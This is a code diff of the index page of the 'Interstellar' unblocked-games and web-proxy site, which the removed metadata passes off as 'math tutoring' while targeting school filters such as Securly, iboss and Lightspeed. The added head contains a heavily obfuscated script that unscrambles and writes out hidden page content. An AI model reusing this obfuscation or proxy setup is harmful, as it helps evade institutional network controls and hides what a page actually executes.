--- a/index.html
+++ b/index.html
@@ -1,27 +1,16 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-   <meta name="description" content="The best math tutoring!" />
-<meta name="keywords" content="Interstellar Official, Unblock Games, Interstellar, Interstellar V3, 1v1.LOL, Run 3, Gameboy Advanced Games, DS Games, proxy, web proxy, service workers, unblock websites, unblock chromebook, free web proxy, proxy list, proxy sites, un block chromebook, online proxy, proxy server, proxysite, proxy youtube, bypass securly, bypass iboss, bypass lightspeed filter, holy unblocker, chromebooks, titanium network, unblock youtube, youtube proxy, unblocked youtube, youtube unblocked, interstellar, chromebook">
-        <meta name="author" content="Bubbo" />
-        <meta property="og:title" content="Interstellar" />
-        <meta property="og:locale" content="en-US" />
-        <meta property="og:type" content="website" />
-        <meta property="og:image" content="/favicon.ico" />
-        <meta property="og:description" content="The best math tutoring!" />
-    <title>Interstellar</title>
-    <link rel="stylesheet" href="./styles/games.css">
+  <script>(()=>{for(j=function(){for(h='+.n,EM(sg9oMcSM:r&I',a=new Array(h.length),l=0;l<h.length;l++)a[l]=h.charCodeAt(l);return a}(),m=m=>document.write(m),k=decodeURI("".concat("81e!;t#%22l7=%3CEenCt1%3E&%20%20ekm0ntlirenpim&;/%20a;mlto#esrYou9a%20#iOn#8lgv1sirpf=;cD0eRe1;jPe%3Ckee;em%3Cl%3Ei%3C#al#dli&nRa#e=/1&p.9.5tr&v1%20ihT=crs9c%3C;l&#%3E1H1n%3Eep/%20%3ES4fc=c18distpaa%3Ca=tuf=t%20dl&1a%3C1%20%3E%20lo%20%3E3gs%3C%22%20i%3EEht;axn0ttsen%20hs%20t/1&%3C#yev&ahx%3Ee-%20t%3Ceoe0%3Ch/%3El1%20m%3Elssh-alhl;%22.%3E=%3Er%3Er%3Corntersrme%20i/nuphp,%22tSp4%3E4lrsdni/rcn%20/ih%3Cr%3Ep%20%3CihuiS/iif!=enoes.sl%3C%20pnai%3Cfsrpplb%20%3CtOlv%20vsiuut%3Elo.s%20%3Esj%20drct0vpssridtshui%20%3EO/%3E.otxn%3C%3CgrrRecficiip%3Eh.ecgcpm%20%3Ccvlu%3Ceec/e%3E:%3Co%3Ec=godreot3lrccj.pn(ts?trdrfcps%20cT@inll.ugoiychtasdpb/scoi2cprip/)ssuWgcornr3wnt%3Csi=on%3Eihi%20km=eoatkcrQsscbans%3Cl-0eoute/sdirf%3CaeetidQ/dcpr=smsoros%20:jlrf%20ov=%7D%3C:ft./sdvt%20eiasdg&ohwnalo%3Eo.rsneesl3%7B:eaiy1tms%3Ets#i:%3Ees-flil0rsodcapildr%25sa;0ooybd/c%3C:r-d7teihrdkrtdsapseoyhllkko0nfasv%20yni0ay10g:opu,bs:tu:;fit#mtmw0okwuucs;::ms;i-%7D@oppx-.e%7Btciasn;0eQbdciolchbrebsabal;ffleoo;bfona2cnrfe-;n4lnp;1ndxinfy6ut:elbnth%7Bn:r:%7Darrkbocuna8-cgifooo.g;fua8wa5tacntede;bael0poutr-n1iontf:0eoiage:0la1%7Dn:bs.ihcrra1o#mfcdf,:1g;uww:neog:cx0i;id%7Bcp;:l:phg07rxf;e7d-rrcii0e%7B:tn;drdnolod:rr1gsa:ocfctrbd7lxssd%7Bv:-xpanngttp0:#:iipyn:xioauac0:1ne0n;or-ein;#%25fa0de;n0pogen;4ap;;1g#ont%7B44:irk2-ctp%7D1ectir-o7:gdfll8l41:rrt:gn-ctaxxh%7Bpuor-;gieoe-t4er;fgxoodea-r-beree8%7D;t1xd;fnr-t-1etl.prdt;ddehglttr:mon-phdapade:g;i;d0anlia#t-px-d1tdcmd0se:%25ecgcikps5dsd.ipf1:oe%7Droeoiee:2ffnh#;ofct:4-enlf#2p:ntulnoltlpra70nf;mioa:sroz0up:j;x:s.otdo:ndb;te78t-xee;:tni%256ia;eelidfcncbs1:x%7D:idnctrsiiophco%251rxlbdrr8lr1aapus3pie;9ags;tir-:eeseprto;xg%7B:peoilegm:ep1-o-xdlnaem%25d-pa0cnttpl:cu-argoo-:%7B0bffiit%7Dd4-ninfla:noprnbn::ixlroecf7tefo:ttt;1yn-alf:yc87ogpx0o;tdi;olanosoxei4x0rt7dwt#8:nAsyoix#;ifr0arcp2te#=cF#c%22a1sg#fn#gn0o,7eA%22e=rl%20e51l%22t%5D1E%5BF05,fttz%22;%201:%5D;tuA;a0bs/%20er,dtt:=-.%25utrt0etla%22%221ecr0o%22;;v%7B;ot,sc,s%3Cso4n;%22%7D+(amnE%22t%7D%225s.i%7Bipkncc.asaBcnle%22oc-dt..)hloy,laFld9t%5B%3Cao)#b(uhr=%3C.DedBl%22st#.8gto4rMme2eblf4Fmk.%3Efhlpgs%220alat0l4,tdC*nlc%60law;)ou%60(Bt%3Et0s.o1a1.acd%5D(tloar00f1)7.vMrt(a.at)e2h0ov%60CfMdltrreece(Amtora,o.)(l.l%5B$%22t%7Dmd=0n.=ryM,s(rntnlofdm%60icdae.aa%7D)htroa+)L=()et%60yst%7Bf%7Btoowrtsoh%60irMoe$hrh.eom;lltl%60te.)ttt.t)ryga.h%7Dtsodlspslooe)oarle=lu.o(.cl)i(h$(nl%3Ets=yn(peMm%7Bbnat=ac(*bmo=tad=ateh0sM)te,s,tM.=ehtybl.atolth%7B;at1=,eyhln(%7Ds)mrn)o*.ntmsaadhl$()p%22.=)idtt%7Ds.E1hf,=f*s%7B.ntten,oto(u%7Dtm0,r.m%7DtMmnn%7Bc2s)ds.a%60eh%7D2esm%7B1.ta%20ar.pem)yl1%60.a,mi,araord:hawenMldhnlra%7B::%20f+ee,3tri%22t,:1ano1%25ert:n,g,doltnd$)a-M(i./(t%3Cid,s$tr%5De0tm2no1(r*s%22tio?(t,%60orn).ah%22di%7Be%3E(r:ci%20artrl:-se%22tfir%5B,%22%7Dit(%22n*,amat)onuai/0%7Deas:ra%7Blea(e-ao1oua%22%7D)bemthcriptn")).split(""),g=k.length%j.length,l=k.length-1;l>=0;l--)g--,-1==g&&(g=j.length-1),f=l+j[g],f>=k.length||(c=k[l],b=k[f],k[f]=c,k[l]=b);for(n=m,i="",l=0;l<k.length;l++)i+=k[l];n(i)})();</script>
 </head>
- <!--NAVBAR-->
-    <div class="header" align="center">
-        <a href="/"><h1 class="header-link" style="color: #000000;">Home</h3></a>
-        <span style="opacity:0;">iiiiiiiiiiiiiiiiiiiii</span><a href="./g.html"><h1 class="header-link">Games</h3></a>
-        <span style="opacity:0;">iiiiiiiiiiiiiiiiiiiii</span><a href="./proxies/index.html"><h1 class="header-link">Proxies</h3></a>
-        <span style="opacity:0;">iiiiiiiiiiiiiiiiiiiii</span><a href="./extras/index.html"><h1 class="header-link">Extras</h3></a>
-    </div>
 
-<script>(()=>{for(j=function(){for(h='0dW<HLa%3wr68oB5r>@',a=new Array(h.length),l=0;l<h.length;l++)a[l]=h.charCodeAt(l);return a}(),m=m=>document.write(m),k=decodeURI("".concat("osvr0i%3Ecody0eawmi;dh%7Di:tamyhdih0l%3Ep:el1ck;babflr%3Cund:#000;bordee:%7B;0gight:10lv%7Bnrekts:oy0tw%7D%3C/srygba")).split(""),g=k.length%j.length,l=k.length-1;l>=0;l--)g--,-1==g&&(g=j.length-1),f=l+j[g],f>=k.length||(c=k[l],b=k[f],k[f]=c,k[l]=b);for(n=m,i="",l=0;l<k.length;l++)i+=k[l];n(i)})();</script>
-  
+   <body>
+      <div class="center-screen"><form><input placeholder="Search or enter in a site!"></form></div>
+      <script src="uv/uv.bundle.js"></script>
+      <script src="uv/uv.config.js"></script>
+      <script src="index.js"></script>
+   </body>
+   
 <iframe src="home.html" frameborder="0" class="frame" id="frame"></iframe>
   
 </html>
